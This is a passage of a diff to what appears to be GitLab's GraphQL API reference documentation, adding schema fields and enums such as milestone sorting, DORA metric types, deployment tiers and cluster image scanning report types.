id="projectissuestatuscountsmilestonetitle"></a>`milestoneTitle` | [`[String]`](#string) | Milestone applied to this issue. | | <a id="projectissuestatuscountsnot"></a>`not` | [`NegatedIssueFilterInput`](#negatedissuefilterinput) | Negated arguments. | @@ -11586,7 +11807,7 @@ four standard [pagination arguments](#connection-pagination-arguments): | <a id="projectissuescreatedbefore"></a>`createdBefore` | [`Time`](#time) | Issues created before this date. | | <a id="projectissuesepicid"></a>`epicId` | [`String`](#string) | ID of an epic associated with the issues, "none" and "any" values are supported. | | <a id="projectissuesiid"></a>`iid` | [`String`](#string) | IID of the issue. For example, "1". | -| <a id="projectissuesiids"></a>`iids` | [`[String!]`](#string) | List of IIDs of issues. For example, ["1", "2"]. | +| <a id="projectissuesiids"></a>`iids` | [`[String!]`](#string) | List of IIDs of issues. For example, `["1", "2"]`. | | <a id="projectissuesiterationid"></a>`iterationId` | [`[ID]`](#id) | List of iteration Global IDs applied to the issue. | | <a id="projectissuesiterationwildcardid"></a>`iterationWildcardId` | [`IterationWildcardId`](#iterationwildcardid) | Filter by iteration ID wildcard. | | <a id="projectissueslabelname"></a>`labelName` | [`[String]`](#string) | Labels applied to this issue. | @@ -11749,6 +11970,7 @@ four standard [pagination arguments](#connection-pagination-arguments): | <a id="projectmilestonesids"></a>`ids` | [`[ID!]`](#id) | Array of global milestone IDs, e.g., `"gid://gitlab/Milestone/1"`. | | <a id="projectmilestonesincludeancestors"></a>`includeAncestors` | [`Boolean`](#boolean) | Also return milestones in the project's parent group and its ancestors. | | <a id="projectmilestonessearchtitle"></a>`searchTitle` | [`String`](#string) | A search string for the title. | +| <a id="projectmilestonessort"></a>`sort` | [`MilestoneSort`](#milestonesort) | Sort milestones by this criteria. | | <a id="projectmilestonesstartdate"></a>`startDate` **{warning-solid}** | [`Time`](#time) | **Deprecated** in 13.5. Use timeframe.start. | | <a id="projectmilestonesstate"></a>`state` | [`MilestoneStateEnum`](#milestonestateenum) | Filter milestones by state. | | <a id="projectmilestonestimeframe"></a>`timeframe` | [`Timeframe`](#timeframe) | List items overlapping the given timeframe. | @@ -11878,7 +12100,7 @@ Returns [`Requirement`](#requirement). | ---- | ---- | ----------- | | <a id="projectrequirementauthorusername"></a>`authorUsername` | [`[String!]`](#string) | Filter requirements by author username. | | <a id="projectrequirementiid"></a>`iid` | [`ID`](#id) | IID of the requirement, e.g., "1". | -| <a id="projectrequirementiids"></a>`iids` | [`[ID!]`](#id) | List of IIDs of requirements, e.g., [1, 2]. | +| <a id="projectrequirementiids"></a>`iids` | [`[ID!]`](#id) | List of IIDs of requirements, e.g., `[1, 2]`. | | <a id="projectrequirementlasttestreportstate"></a>`lastTestReportState` | [`RequirementStatusFilter`](#requirementstatusfilter) | The state of latest requirement test report. | | <a id="projectrequirementsearch"></a>`search` | [`String`](#string) | Search query for requirement title. | | <a id="projectrequirementsort"></a>`sort` | [`Sort`](#sort) | List requirements by sort order. | @@ -11900,7 +12122,7 @@ four standard [pagination arguments](#connection-pagination-arguments): | ---- | ---- | ----------- | | <a id="projectrequirementsauthorusername"></a>`authorUsername` | [`[String!]`](#string) | Filter requirements by author username. | | <a id="projectrequirementsiid"></a>`iid` | [`ID`](#id) | IID of the requirement, e.g., "1". | -| <a id="projectrequirementsiids"></a>`iids` | [`[ID!]`](#id) | List of IIDs of requirements, e.g., [1, 2]. | +| <a id="projectrequirementsiids"></a>`iids` | [`[ID!]`](#id) | List of IIDs of requirements, e.g., `[1, 2]`. | | <a id="projectrequirementslasttestreportstate"></a>`lastTestReportState` | [`RequirementStatusFilter`](#requirementstatusfilter) | The state of latest requirement test report. | | <a id="projectrequirementssearch"></a>`search` | [`String`](#string) | Search query for requirement title. | | <a id="projectrequirementssort"></a>`sort` | [`Sort`](#sort) | List requirements by sort order. | @@ -12152,6 +12374,15 @@ Pypi metadata. | <a id="pypimetadataid"></a>`id` | [`PackagesPypiMetadatumID!`](#packagespypimetadatumid) | ID of the metadatum. | | <a id="pypimetadatarequiredpython"></a>`requiredPython` | [`String`](#string) | Required Python version of the Pypi package. | +### `QueryComplexity` + +#### Fields + +| Name | Type | Description | +| ---- | ---- | ----------- | +| <a id="querycomplexitylimit"></a>`limit` | [`Int`](#int) | GraphQL query complexity limit. See [GitLab documentation on this limit](https://docs.gitlab.com/ee/api/graphql/index.html#max-query-complexity). | +| <a id="querycomplexityscore"></a>`score` | [`Int`](#int) | GraphQL query complexity score. | + ### `RecentFailures` Recent failure history of a test case. @@ -12194,6 +12425,7 @@ Represents an asset link associated with a release. | Name | Type | Description | | ---- | ---- | ----------- | +| <a id="releaseassetlinkdirectassetpath"></a>`directAssetPath` | [`String`](#string) | Relative path for the direct asset link. | | <a id="releaseassetlinkdirectasseturl"></a>`directAssetUrl` | [`String`](#string) | Direct asset URL of the link. | | <a id="releaseassetlinkexternal"></a>`external` | [`Boolean`](#boolean) | Indicates the link points to an external resource. | | <a id="releaseassetlinkid"></a>`id` | [`ID!`](#id) | ID of the link. | @@ -12549,6 +12781,7 @@ Represents summary of a security report. | Name | Type | Description | | ---- | ---- | ----------- | | <a id="securityreportsummaryapifuzzing"></a>`apiFuzzing` | [`SecurityReportSummarySection`](#securityreportsummarysection) | Aggregated counts for the `api_fuzzing` scan. | +| <a id="securityreportsummaryclusterimagescanning"></a>`clusterImageScanning` | [`SecurityReportSummarySection`](#securityreportsummarysection) | Aggregated counts for the `cluster_image_scanning` scan. | | <a id="securityreportsummarycontainerscanning"></a>`containerScanning` | [`SecurityReportSummarySection`](#securityreportsummarysection) | Aggregated counts for the `container_scanning` scan. | | <a id="securityreportsummarycoveragefuzzing"></a>`coverageFuzzing` | [`SecurityReportSummarySection`](#securityreportsummarysection) | Aggregated counts for the `coverage_fuzzing` scan. | | <a id="securityreportsummarydast"></a>`dast` | [`SecurityReportSummarySection`](#securityreportsummarysection) | Aggregated counts for the `dast` scan. | @@ -12814,6 +13047,7 @@ Represents the snippet blob. | <a id="snippetblobpath"></a>`path` | [`String`](#string) | Blob path. | | <a id="snippetblobplaindata"></a>`plainData` | [`String`](#string) | Blob plain highlighted data. | | <a id="snippetblobrawpath"></a>`rawPath` | [`String!`](#string) | Blob raw content endpoint path. | +| <a id="snippetblobrawplaindata"></a>`rawPlainData` | [`String`](#string) | The raw content of the blob, if the blob is text data. | | <a id="snippetblobrenderedastext"></a>`renderedAsText` | [`Boolean!`](#boolean) | Shows whether the blob is rendered as text. | | <a id="snippetblobrichdata"></a>`richData` | [`String`](#string) | Blob highlighted data. | | <a id="snippetblobrichviewer"></a>`richViewer` | [`SnippetBlobViewer`](#snippetblobviewer) | Blob content rich viewer. | @@ -12874,6 +13108,7 @@ Represents the Geo sync and verification state of a snippet repository. | ---- | ---- | ----------- | | <a id="statusactionbuttontitle"></a>`buttonTitle` | [`String`](#string) | Title for the button, for example: Retry this job. | | <a id="statusactionicon"></a>`icon` | [`String`](#string) | Icon used in the action button. | +| <a id="statusactionid"></a>`id` | [`String!`](#string) | ID for a status action. | | <a id="statusactionmethod"></a>`method` | [`String`](#string) | Method for the action, for example: :post. | | <a id="statusactionpath"></a>`path` | [`String`](#string) | Path for the action. | | <a id="statusactiontitle"></a>`title` | [`String`](#string) | Title for the action, for example: Retry. | @@ -13155,7 +13390,7 @@ Represents a recorded measurement (object count) for the Admins. | Name | Type | Description | | ---- | ---- | ----------- | | <a id="usercalloutdismissedat"></a>`dismissedAt` | [`Time`](#time) | Date when the callout was dismissed. | -| <a id="usercalloutfeaturename"></a>`featureName` | [`UserCalloutFeatureNameEnum!`](#usercalloutfeaturenameenum) | Name of the feature that the callout is for. | +| <a id="usercalloutfeaturename"></a>`featureName` | [`UserCalloutFeatureNameEnum`](#usercalloutfeaturenameenum) | Name of the feature that the callout is for. | ### `UserCore` @@ -13406,7 +13641,7 @@ Represents a vulnerability. | <a id="vulnerabilitynotes"></a>`notes` | [`NoteConnection!`](#noteconnection) | All notes on this noteable. (see [Connections](#connections)) | | <a id="vulnerabilityprimaryidentifier"></a>`primaryIdentifier` | [`VulnerabilityIdentifier`](#vulnerabilityidentifier) | Primary identifier of the vulnerability. | | <a id="vulnerabilityproject"></a>`project` | [`Project`](#project) | The project on which the vulnerability was found. | -| <a id="vulnerabilityreporttype"></a>`reportType` | [`VulnerabilityReportType`](#vulnerabilityreporttype) | Type of the security report that found the vulnerability (SAST, DEPENDENCY_SCANNING, CONTAINER_SCANNING, DAST, SECRET_DETECTION, COVERAGE_FUZZING, API_FUZZING). `Scan Type` in the UI. | +| <a id="vulnerabilityreporttype"></a>`reportType` | [`VulnerabilityReportType`](#vulnerabilityreporttype) | Type of the security report that found the vulnerability (SAST, DEPENDENCY_SCANNING, CONTAINER_SCANNING, DAST, SECRET_DETECTION, COVERAGE_FUZZING, API_FUZZING, CLUSTER_IMAGE_SCANNING). `Scan Type` in the UI. | | <a id="vulnerabilityresolvedat"></a>`resolvedAt` | [`Time`](#time) | Timestamp of when the vulnerability state was changed to resolved. | | <a id="vulnerabilityresolvedby"></a>`resolvedBy` | [`UserCore`](#usercore) | The user that resolved the vulnerability. | | <a id="vulnerabilityresolvedondefaultbranch"></a>`resolvedOnDefaultBranch` | [`Boolean!`](#boolean) | Indicates whether the vulnerability is fixed on the default branch or not. | @@ -13851,8 +14086,8 @@ Values for sorting alerts. | <a id="alertmanagementalertsortseverity_desc"></a>`SEVERITY_DESC` | Severity from more critical to less critical. | | <a id="alertmanagementalertsortstarted_at_asc"></a>`STARTED_AT_ASC` | Start time by ascending order. | | <a id="alertmanagementalertsortstarted_at_desc"></a>`STARTED_AT_DESC` | Start time by descending order. | -| <a id="alertmanagementalertsortstatus_asc"></a>`STATUS_ASC` | Status by order: Ignored > Resolved > Acknowledged > Triggered. | -| <a id="alertmanagementalertsortstatus_desc"></a>`STATUS_DESC` | Status by order: Triggered > Acknowledged > Resolved > Ignored. | +| <a id="alertmanagementalertsortstatus_asc"></a>`STATUS_ASC` | Status by order: `Ignored > Resolved > Acknowledged > Triggered`. | +| <a id="alertmanagementalertsortstatus_desc"></a>`STATUS_DESC` | Status by order: `Triggered > Acknowledged > Resolved > Ignored`. | | <a id="alertmanagementalertsortupdated_asc"></a>`UPDATED_ASC` | Updated at ascending order. | | <a id="alertmanagementalertsortupdated_desc"></a>`UPDATED_DESC` | Updated at descending order. | | <a id="alertmanagementalertsortupdated_time_asc"></a>`UPDATED_TIME_ASC` | Created time by ascending order. | @@ -14207,6 +14442,18 @@ Weight of the data visualization palette. | <a id="datavisualizationweightenumweight_900"></a>`WEIGHT_900` | 900 weight. | | <a id="datavisualizationweightenumweight_950"></a>`WEIGHT_950` | 950 weight. | +### `DeploymentTier` + +All environment deployment tiers. + +| Value | Description | +| ----- | ----------- | +| <a id="deploymenttierdevelopment"></a>`DEVELOPMENT` | Development. | +| <a id="deploymenttierother"></a>`OTHER` | Other. | +| <a id="deploymenttierproduction"></a>`PRODUCTION` | Production. | +| <a id="deploymenttierstaging"></a>`STAGING` | Staging. | +| <a id="deploymenttiertesting"></a>`TESTING` | Testing. | + ### `DesignCollectionCopyState` Copy state of a DesignCollection. @@ -14237,6 +14484,25 @@ Type of file the position refers to. | <a id="diffpositiontypeimage"></a>`image` | An image. | | <a id="diffpositiontypetext"></a>`text` | A text file. | +### `DoraMetricBucketingInterval` + +All possible ways that DORA metrics can be aggregated. + +| Value | Description | +| ----- | ----------- | +| <a id="dorametricbucketingintervalall"></a>`ALL` | All data points are combined into a single value. | +| <a id="dorametricbucketingintervaldaily"></a>`DAILY` | Data points are combined into chunks by day. | +| <a id="dorametricbucketingintervalmonthly"></a>`MONTHLY` | Data points are combined into chunks by month. | + +### `DoraMetricType` + +All supported DORA metric types. + +| Value | Description | +| ----- | ----------- | +| <a id="dorametrictypedeployment_frequency"></a>`DEPLOYMENT_FREQUENCY` | Deployment frequency. | +| <a id="dorametrictypelead_time_for_changes"></a>`LEAD_TIME_FOR_CHANGES` | Lead time for changes. | + ### `EntryType` Type of a tree entry. @@ -14257,6 +14523,8 @@ Roadmap sort values. | <a id="epicsortend_date_desc"></a>`END_DATE_DESC` | Sort by end date in descending order. | | <a id="epicsortstart_date_asc"></a>`START_DATE_ASC` | Sort by start date in ascending order. | | <a id="epicsortstart_date_desc"></a>`START_DATE_DESC` | Sort by start date in descending order. | +| <a id="epicsorttitle_asc"></a>`TITLE_ASC` | Sort by title in ascending order. | +| <a id="epicsorttitle_desc"></a>`TITLE_DESC` | Sort by title in descending order. | | <a id="epicsortend_date_asc"></a>`end_date_asc` **{warning-solid}** | **Deprecated** in 13.11. Use END_DATE_ASC. | | <a id="epicsortend_date_desc"></a>`end_date_desc` **{warning-solid}** | **Deprecated** in 13.11. Use END_DATE_DESC. | | <a id="epicsortstart_date_asc"></a>`start_date_asc` **{warning-solid}** | **Deprecated** in 13.11. Use START_DATE_ASC. | @@ -14268,9 +14536,9 @@ State of an epic. | Value | Description | | ----- | ----------- | -| <a id="epicstateall"></a>`all` | | -| <a id="epicstateclosed"></a>`closed` | | -| <a id="epicstateopened"></a>`opened` | | +| <a id="epicstateall"></a>`all` | All epics. | +| <a id="epicstateclosed"></a>`closed` | Closed epics. | +| <a id="epicstateopened"></a>`opened` | Open epics. | ### `EpicStateEvent` @@ -14306,7 +14574,6 @@ Event action. | Value | Description | | ----- | ----------- | | <a id="eventactionapproved"></a>`APPROVED` | Approved action. | -| <a id="eventactionarchived"></a>`ARCHIVED` | Archived action. | | <a id="eventactionclosed"></a>`CLOSED` | Closed action. | | <a id="eventactioncommented"></a>`COMMENTED` | Commented action. | | <a id="eventactioncreated"></a>`CREATED` | Created action. | @@ -14335,9 +14602,18 @@ Health status of an issue or epic. | Value | Description | | ----- | ----------- | -| <a id="healthstatusatrisk"></a>`atRisk` | | -| <a id="healthstatusneedsattention"></a>`needsAttention` | | -| <a id="healthstatusontrack"></a>`onTrack` | | +| <a id="healthstatusatrisk"></a>`atRisk` | At risk. | +| <a id="healthstatusneedsattention"></a>`needsAttention` | Needs attention. | +| <a id="healthstatusontrack"></a>`onTrack` | On track. | + +### `IssuableSearchableField` + +Fields to perform the search in. + +| Value | Description | +| ----- | ----------- | +| <a id="issuablesearchablefielddescription"></a>`DESCRIPTION` | Search in description field. | +| <a id="issuablesearchablefieldtitle"></a>`TITLE` | Search in title field. | ### `IssuableSeverity` @@ -14368,6 +14644,8 @@ Values for sorting issues. | Value | Description | | ----- | ----------- | +| <a id="issuesortblocking_issues_asc"></a>`BLOCKING_ISSUES_ASC` | Blocking issues count by ascending order. | +| <a id="issuesortblocking_issues_desc"></a>`BLOCKING_ISSUES_DESC` | Blocking issues count by descending order. | | <a id="issuesortcreated_asc"></a>`CREATED_ASC` | Created at ascending order. | | <a id="issuesortcreated_desc"></a>`CREATED_DESC` | Created at descending order. | | <a id="issuesortdue_date_asc"></a>`DUE_DATE_ASC` | Due date by ascending order. | @@ -14376,6 +14654,8 @@ Values for sorting issues. | <a id="issuesortlabel_priority_desc"></a>`LABEL_PRIORITY_DESC` | Label priority by descending order. | | <a id="issuesortmilestone_due_asc"></a>`MILESTONE_DUE_ASC` | Milestone due date by ascending order. | | <a id="issuesortmilestone_due_desc"></a>`MILESTONE_DUE_DESC` | Milestone due date by descending order. | +| <a id="issuesortpopularity_asc"></a>`POPULARITY_ASC` | Number of upvotes (awarded "thumbs up" emoji) by ascending order. | +| <a id="issuesortpopularity_desc"></a>`POPULARITY_DESC` | Number of upvotes (awarded "thumbs up" emoji) by descending order. | | <a id="issuesortpriority_asc"></a>`PRIORITY_ASC` | Priority by ascending order. | | <a id="issuesortpriority_desc"></a>`PRIORITY_DESC` | Priority by descending order. | | <a id="issuesortpublished_asc"></a>`PUBLISHED_ASC` | Published issues shown last. | @@ -14433,8 +14713,9 @@ State of a GitLab iteration. | ----- | ----------- | | <a id="iterationstateall"></a>`all` | | | <a id="iterationstateclosed"></a>`closed` | | +| <a id="iterationstatecurrent"></a>`current` | | | <a id="iterationstateopened"></a>`opened` | | -| <a id="iterationstatestarted"></a>`started` | | +| <a id="iterationstatestarted"></a>`started` **{warning-solid}** | **Deprecated** in 14.1. Use current instead. | | <a id="iterationstateupcoming"></a>`upcoming` | | ### `IterationWildcardId` @@ -14456,6 +14737,7 @@ Iteration ID wildcard values. | <a id="jobartifactfiletypearchive"></a>`ARCHIVE` | ARCHIVE job artifact file type. | | <a id="jobartifactfiletypebrowser_performance"></a>`BROWSER_PERFORMANCE` | BROWSER PERFORMANCE job artifact file type. | | <a id="jobartifactfiletypecluster_applications"></a>`CLUSTER_APPLICATIONS` | CLUSTER APPLICATIONS job artifact file type. | +| <a id="jobartifactfiletypecluster_image_scanning"></a>`CLUSTER_IMAGE_SCANNING` | CLUSTER IMAGE SCANNING job artifact file type. | | <a id="jobartifactfiletypecobertura"></a>`COBERTURA` | COBERTURA job artifact file type. | | <a id="jobartifactfiletypecodequality"></a>`CODEQUALITY` | CODE QUALITY job artifact file type. | | <a id="jobartifactfiletypecontainer_scanning"></a>`CONTAINER_SCANNING` | CONTAINER SCANNING job artifact file type. | @@ -14578,6 +14860,25 @@ Representation of whether a GitLab merge request can be merged. | <a id="mergestrategyenummerge_train"></a>`MERGE_TRAIN` | Use the merge_train merge strategy. | | <a id="mergestrategyenummerge_when_pipeline_succeeds"></a>`MERGE_WHEN_PIPELINE_SUCCEEDS` | Use the merge_when_pipeline_succeeds merge strategy. | +### `MilestoneSort` + +Values for sorting milestones. + +| Value | Description | +| ----- | ----------- | +| <a id="milestonesortcreated_asc"></a>`CREATED_ASC` | Created at ascending order. | +| <a id="milestonesortcreated_desc"></a>`CREATED_DESC` | Created at descending order. | +| <a id="milestonesortdue_date_asc"></a>`DUE_DATE_ASC` | Milestone due date by ascending order. | +| <a id="milestonesortdue_date_desc"></a>`DUE_DATE_DESC` | Milestone due date by descending order. | +| <a id="milestonesortexpired_last_due_date_asc"></a>`EXPIRED_LAST_DUE_DATE_ASC` | Group milestones in this order: non-expired milestones with due dates, non-expired milestones without due dates and expired milestones then sort by due date in ascending order. | +| <a id="milestonesortexpired_last_due_date_desc"></a>`EXPIRED_LAST_DUE_DATE_DESC` | Group milestones in this order: non-expired milestones with due dates, non-expired milestones without due dates and expired milestones then sort by due date in descending order. | +| <a id="milestonesortupdated_asc"></a>`UPDATED_ASC` | Updated at ascending order. | +| <a id="milestonesortupdated_desc"></a>`UPDATED_DESC` | Updated at descending order. | +| <a id="milestonesortcreated_asc"></a>`created_asc` **{warning-solid}** | **Deprecated** in 13.5. This was renamed. Use: `CREATED_ASC`. | +| <a id="milestonesortcreated_desc"></a>`created_desc` **{warning-solid}** | **Deprecated** in 13.5. This was renamed. Use: `CREATED_DESC`. | +| <a id="milestonesortupdated_asc"></a>`updated_asc` **{warning-solid}** | **Deprecated** in 13.5. This was renamed. Use: `UPDATED_ASC`. | +| <a id="milestonesortupdated_desc"></a>`updated_desc` **{warning-solid}** | **Deprecated** in 13.5. This was renamed. Use: `UPDATED_DESC`. | + ### `MilestoneStateEnum` Current state of milestone. @@ -14623,6 +14924,15 @@ Negated Iteration ID wildcard values. | ----- | ----------- | | <a id="negatediterationwildcardidcurrent"></a>`CURRENT` | Current iteration. | +### `NetworkPolicyKind` + +Kind of the network policy. + +| Value | Description | +| ----- | ----------- | +| <a id="networkpolicykindciliumnetworkpolicy"></a>`CiliumNetworkPolicy` | The policy kind of Cilium Network Policy. | +| <a id="networkpolicykindnetworkpolicy"></a>`NetworkPolicy` | The policy kind of Network Policy. | + ### `OncallRotationUnitEnum` Rotation length unit of an on-call rotation. @@ -14799,6 +15109,7 @@ Size of UI component in SAST configuration page. | Value | Description | | ----- | ----------- | | <a id="securityreporttypeenumapi_fuzzing"></a>`API_FUZZING` | API FUZZING scan report. | +| <a id="securityreporttypeenumcluster_image_scanning"></a>`CLUSTER_IMAGE_SCANNING` | CLUSTER IMAGE SCANNING scan report. | | <a id="securityreporttypeenumcontainer_scanning"></a>`CONTAINER_SCANNING` | CONTAINER SCANNING scan report. | | <a id="securityreporttypeenumcoverage_fuzzing"></a>`COVERAGE_FUZZING` | COVERAGE FUZZING scan report. | | <a id="securityreporttypeenumdast"></a>`DAST` | DAST scan report. | @@ -14813,6 +15124,7 @@ The type of the security scanner. | Value | Description | | ----- | ----------- | | <a id="securityscannertypeapi_fuzzing"></a>`API_FUZZING` | | +| <a id="securityscannertypecluster_image_scanning"></a>`CLUSTER_IMAGE_SCANNING` | | | <a id="securityscannertypecontainer_scanning"></a>`CONTAINER_SCANNING` | | | <a id="securityscannertypecoverage_fuzzing"></a>`COVERAGE_FUZZING` | | | <a id="securityscannertypedast"></a>`DAST` | | @@ -14964,6 +15276,7 @@ Name of the feature that the callout is for. | <a id="usercalloutfeaturenameenumactive_user_count_threshold"></a>`ACTIVE_USER_COUNT_THRESHOLD` | Callout feature name for active_user_count_threshold. | | <a id="usercalloutfeaturenameenumbuy_pipeline_minutes_notification_dot"></a>`BUY_PIPELINE_MINUTES_NOTIFICATION_DOT` | Callout feature name for buy_pipeline_minutes_notification_dot. | | <a id="usercalloutfeaturenameenumcanary_deployment"></a>`CANARY_DEPLOYMENT` | Callout feature name for canary_deployment. | +| <a id="usercalloutfeaturenameenumcloud_licensing_subscription_activation_banner"></a>`CLOUD_LICENSING_SUBSCRIPTION_ACTIVATION_BANNER` | Callout feature name for cloud_licensing_subscription_activation_banner. | | <a id="usercalloutfeaturenameenumcluster_security_warning"></a>`CLUSTER_SECURITY_WARNING` | Callout feature name for cluster_security_warning. | | <a id="usercalloutfeaturenameenumcustomize_homepage"></a>`CUSTOMIZE_HOMEPAGE` | Callout feature name for customize_homepage. | | <a id="usercalloutfeaturenameenumeoa_bronze_plan_banner"></a>`EOA_BRONZE_PLAN_BANNER` | Callout feature name for eoa_bronze_plan_banner. | @@ -14978,12 +15291,15 @@ Name of the feature that the callout is for. | <a id="usercalloutfeaturenameenumpipeline_needs_banner"></a>`PIPELINE_NEEDS_BANNER` | Callout feature name for pipeline_needs_banner. | | <a id="usercalloutfeaturenameenumpipeline_needs_hover_tip"></a>`PIPELINE_NEEDS_HOVER_TIP` | Callout feature name for pipeline_needs_hover_tip. | | <a id="usercalloutfeaturenameenumregistration_enabled_callout"></a>`REGISTRATION_ENABLED_CALLOUT` | Callout feature name for registration_enabled_callout. | +| <a id="usercalloutfeaturenameenumsecurity_configuration_devops_alert"></a>`SECURITY_CONFIGURATION_DEVOPS_ALERT` | Callout feature name for security_configuration_devops_alert. | | <a id="usercalloutfeaturenameenumsecurity_configuration_upgrade_banner"></a>`SECURITY_CONFIGURATION_UPGRADE_BANNER` | Callout feature name for security_configuration_upgrade_banner. | | <a id="usercalloutfeaturenameenumservice_templates_deprecated_callout"></a>`SERVICE_TEMPLATES_DEPRECATED_CALLOUT` | Callout feature name for service_templates_deprecated_callout. | | <a id="usercalloutfeaturenameenumsuggest_pipeline"></a>`SUGGEST_PIPELINE` | Callout feature name for suggest_pipeline. | | <a id="usercalloutfeaturenameenumsuggest_popover_dismissed"></a>`SUGGEST_POPOVER_DISMISSED` | Callout feature name for suggest_popover_dismissed. | | <a id="usercalloutfeaturenameenumtabs_position_highlight"></a>`TABS_POSITION_HIGHLIGHT` | Callout feature name for tabs_position_highlight. | | <a id="usercalloutfeaturenameenumthreat_monitoring_info"></a>`THREAT_MONITORING_INFO` | Callout feature name for threat_monitoring_info. | +| <a id="usercalloutfeaturenameenumtrial_status_reminder_d14"></a>`TRIAL_STATUS_REMINDER_D14` | Callout feature name for trial_status_reminder_d14. | +| <a id="usercalloutfeaturenameenumtrial_status_reminder_d3"></a>`TRIAL_STATUS_REMINDER_D3` | Callout feature name for trial_status_reminder_d3. | | <a id="usercalloutfeaturenameenumultimate_trial"></a>`ULTIMATE_TRIAL` | Callout feature name for ultimate_trial. | | <a id="usercalloutfeaturenameenumunfinished_tag_cleanup_callout"></a>`UNFINISHED_TAG_CLEANUP_CALLOUT` | Callout feature name for unfinished_tag_cleanup_callout. | | <a id="usercalloutfeaturenameenumweb_ide_alert_dismissed"></a>`WEB_IDE_ALERT_DISMISSED` | Callout feature name for web_ide_alert_dismissed. | @@ -15071,6 +15387,7 @@ The type of the security scan that found the vulnerability. | Value | Description | | ----- | ----------- | | <a id="vulnerabilityreporttypeapi_fuzzing"></a>`API_FUZZING` | | +| <a id="vulnerabilityreporttypecluster_image_scanning"></a>`CLUSTER_IMAGE_SCANNING` | | | <a id="vulnerabilityreporttypecontainer_scanning"></a>`CONTAINER_SCANNING` | | | <a id="vulnerabilityreporttypecoverage_fuzzing"></a>`COVERAGE_FUZZING` | | | <a id="vulnerabilityreporttypedast"></a>`DAST` | | @@ -15386,6 +15703,13 @@ An example `IncidentManagementOncallRotationID` is: `"gid://gitlab/IncidentManag Represents non-fractional signed whole numeric values. Int can represent values between -(2^31) and 2^31 - 1. +### `IntegrationsPrometheusID` + +A `IntegrationsPrometheusID` is a global ID. It is encoded as a string. + +An example `IntegrationsPrometheusID` is: `"gid://gitlab/Integrations::Prometheus/1"`. +The older format `"gid://gitlab/PrometheusService/1"` was deprecated in 14.1. + ### `IssuableID` A `IssuableID` is a global ID. It is encoded as a string. @@ -15531,12 +15855,6 @@ A `ProjectID` is a global ID. It is encoded as a string. An example `ProjectID` is: `"gid://gitlab/Project/1"`. -### `PrometheusServiceID` - -A `PrometheusServiceID` is a global ID. It is encoded as a string. - -An example `PrometheusServiceID` is: `"gid://gitlab/PrometheusService/1"`. - ### `ReleasesLinkID` A `ReleasesLinkID` is a global ID. It is encoded as a string. @@ -15636,6 +15954,16 @@ One of: - [`Issue`](#issue) - [`MergeRequest`](#mergerequest) +#### `NoteableType` + +Represents an object that supports notes. + +One of: + +- [`Design`](#design) +- [`Issue`](#issue) +- [`MergeRequest`](#mergerequest) + #### `PackageMetadata` Represents metadata associated with a Package. @@ -15804,7 +16132,7 @@ Implementations: | <a id="memberinterfaceupdatedat"></a>`updatedAt` | [`Time`](#time) | Date and time the membership was last updated. | | <a id="memberinterfaceuser"></a>`user` | [`UserCore`](#usercore) | User that is associated with the member object. | -#### `Noteable` +#### `NoteableInterface` Implementations: @@ -15822,8 +16150,8 @@ Implementations: | Name | Type | Description | | ---- | ---- | ----------- | -| <a id="noteablediscussions"></a>`discussions` | [`DiscussionConnection!`](#discussionconnection) | All discussions on this noteable. (see [Connections](#connections)) | -| <a id="noteablenotes"></a>`notes` | [`NoteConnection!`](#noteconnection) | All notes on this noteable. (see [Connections](#connections)) | +| <a id="noteableinterfacediscussions"></a>`discussions` | [`DiscussionConnection!`](#discussionconnection) | All discussions on this noteable. (see [Connections](#connections)) | +| <a id="noteableinterfacenotes"></a>`notes` | [`NoteConnection!`](#noteconnection) | All notes on this noteable. (see [Connections](#connections)) | #### `PackageFileMetadata` @@ -16091,7 +16419,7 @@ Field that are available while modifying the custom mapping attributes for an HT | <a id="boardissueinputauthorusername"></a>`authorUsername` | [`String`](#string) | Filter by author username. | | <a id="boardissueinputepicid"></a>`epicId` | [`EpicID`](#epicid) | Filter by epic ID. Incompatible with epicWildcardId. | | <a id="boardissueinputepicwildcardid"></a>`epicWildcardId` | [`EpicWildcardId`](#epicwildcardid) | Filter by epic ID wildcard. Incompatible with epicId. | -| <a id="boardissueinputiids"></a>`iids` | [`[String!]`](#string) | List of IIDs of issues. For example ["1", "2"]. | +| <a id="boardissueinputiids"></a>`iids` | [`[String!]`](#string) | List of IIDs of issues. For example `["1", "2"]`. | | <a id="boardissueinputiterationid"></a>`iterationId` | [`[IterationID!]`](#iterationid) | Filter by a list of iteration IDs. Incompatible with iterationWildcardId. | | <a id="boardissueinputiterationtitle"></a>`iterationTitle` | [`String`](#string) | Filter by iteration title. | | <a id="boardissueinputiterationwildcardid"></a>`iterationWildcardId` | [`IterationWildcardId`](#iterationwildcardid) | Filter by iteration ID wildcard. | @@ -16245,7 +16573,7 @@ Represents an escalation rule. | <a id="negatedboardissueinputassigneeusername"></a>`assigneeUsername` | [`[String]`](#string) | Filter by assignee username. | | <a id="negatedboardissueinputauthorusername"></a>`authorUsername` | [`String`](#string) | Filter by author username. | | <a id="negatedboardissueinputepicid"></a>`epicId` | [`EpicID`](#epicid) | Filter by epic ID. Incompatible with epicWildcardId. | -| <a id="negatedboardissueinputiids"></a>`iids` | [`[String!]`](#string) | List of IIDs of issues. For example ["1", "2"]. | +| <a id="negatedboardissueinputiids"></a>`iids` | [`[String!]`](#string) | List of IIDs of issues. For example `["1", "2"]`. | | <a id="negatedboardissueinputiterationid"></a>`iterationId` | [`[IterationID!]`](#iterationid) | Filter by a list of iteration IDs. Incompatible with iterationWildcardId. | | <a id="negatedboardissueinputiterationtitle"></a>`iterationTitle` | [`String`](#string) | Filter by iteration title. | | <a id="negatedboardissueinputiterationwildcardid"></a>`iterationWildcardId` | [`NegatedIterationWildcardId`](#negatediterationwildcardid) | Filter by iteration ID wildcard. | @@ -16284,7 +16612,7 @@ Represents an escalation rule. | <a id="negatedissuefilterinputassigneeid"></a>`assigneeId` | [`String`](#string) | ID of a user not assigned to the issues. | | <a id="negatedissuefilterinputassigneeusernames"></a>`assigneeUsernames` | [`[String!]`](#string) | Usernames of users not assigned to the issue. | | <a id="negatedissuefilterinputepicid"></a>`epicId` | [`String`](#string) | ID of an epic not associated with the issues. | -| <a id="negatedissuefilterinputiids"></a>`iids` | [`[String!]`](#string) | List of IIDs of issues to exclude. For example, [1, 2]. | +| <a id="negatedissuefilterinputiids"></a>`iids` | [`[String!]`](#string) | List of IIDs of issues to exclude. For example, `[1, 2]`. | | <a id="negatedissuefilterinputiterationid"></a>`iterationId` | [`[ID!]`](#id) | List of iteration Global IDs not applied to the issue. | | <a id="negatedissuefilterinputiterationwildcardid"></a>`iterationWildcardId` | 